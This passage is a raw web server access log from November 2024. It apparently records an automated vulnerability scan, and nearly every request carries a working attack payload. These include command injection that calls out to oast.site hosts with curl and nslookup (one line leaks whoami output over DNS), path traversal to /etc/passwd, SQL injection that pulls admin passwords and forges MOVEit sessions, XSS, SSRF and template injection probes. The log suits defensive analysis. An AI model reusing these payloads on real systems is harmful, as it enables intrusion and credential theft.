Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /texteditor.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /mbilling/lib/icepay/icepay.php?democ=2pVJVrHi60fA82uXkIjMaGLDSYm;curl%20ct4hu7d65jrdcfcsg340giyweaq5dhxgk.oast.site; HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /index.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 0.3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d HTTP/1.1" 403 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /assets/built%2F..%2F..%2F/package.json HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /client/manage/ourphp_out.php?ourphp_admin=logout&out= HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.81" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /wp-json/igd/v1/get-users-data HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /111/rs:fit:400:400:0:0/plain/http://ct4hu7d65jrdcfcsg3403b7fripncg6tf.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /wp-login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x8664 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /assets/built%252F..%252F..%252F%25E0%25A4%25A/package.json HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /login/index.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /Servlet/Skins HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 OS/10.0.22000" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /2pVJVrytomnqggXgS24lXBjN7ll.jsp HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /admin/login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /v1/warehouse/pending-events HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /admin/dashboard.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /_api/web/siteusers HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).ct4hu7d65jrdcfcsg340mst5f9kgrxjbb.oast.site%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%2296.9.228.88:888%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /client/manage/ourphp_tz.php?act=rt&callback= HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.39" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /?rest_route=/wp/v2/users HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /feed/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.8" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /2pVJVqDi0g2v3zOGGeG7mFjU93G HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.6.21" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "POST /app HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.4.19" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /author-sitemap.xml HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:51 +0800] "GET /app?service=page/PrinterList HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET / HTTP/1.1" 403 146 "-" "python-requests/2.26.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /ajax.php?action=save_user HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 14989.107.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /login.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.1517.3 Ddg/17.3" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /enrollment/ajax.php?action=login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /?q=./gibbon.sql HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /appliance/login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML: like Gecko) Version/16.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /enrollment/index.php?page=home HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.18" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /guestaccess.aspx HTTP/1.1" 404 146 "-" "python-requests/2.26.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /_images/CqMXvG HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /api/runscript HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1482.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /inizio.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.2.26" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /default.aspx?years=http://oast.pro HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.64" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /public/ticket/ajax/ajax.php?action=getContacts&email=% HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /creaprezzi.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /main/webservices/additional_webservices.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /goform/aspForm HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/122.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /nnjxmgs HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/601.5.3 (KHTML, like Gecko) Version/9.1.2 Safari/601.5.3" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.50" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "POST /jeecg-boot/jmreport/show HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0" 172.18.0.4 - - [29/Nov/2024:09:56:52 +0800] "GET /templates/pages/debug_panel.php?id=2pVJVghXLuRPbDnYzRCfsDJbjAv\x22> HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4867.0 Safari/537.36 Edg/100.0.1169.1" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /file-manager/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.17" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.56" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /cgi-bin/exportCfgwithpasswd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /mifs/aad/api/v2/admins/users HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 labane?flipp_vcpm" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /mifs/asfV3/api/v2/admins/users HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /main/webservices/additional_webservices.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 maglev/24004.1309.2689.2246/49" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /loganalyzer/asktheoracle.php?type=domain&query&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile=KynCe%3Bcurl+ct4hu7d65jrdcfcsg340jbm589gptykyi.oast.site+%23 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.6.26" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /print.php?nm_member= HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML: like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /webauth_operation.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /file-manager/backend/makefile HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15231.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.13" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /file-manager/backend/text HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.1" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /file-manager/backend/permissions HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /v56RSvkM53.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /loadfile.lp?pageid=Configure HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 12239.92.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.136 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /v1/folder?path=%2F HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /v1/folder?path=%2F HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Firefox/99.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /.cpr/%2Fetc%2Fpasswd HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.55" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /pig/add-pig.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.16" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /api/server/version HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /api/users HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/E7FBAF" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "GET /webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25" 172.18.0.4 - - [29/Nov/2024:09:56:53 +0800] "POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+IpAddress=%2796.9.228.88%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272pVJW1dR8DJAg24ivWmyc4vVJ1P%27%23 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:54 +0800] "GET 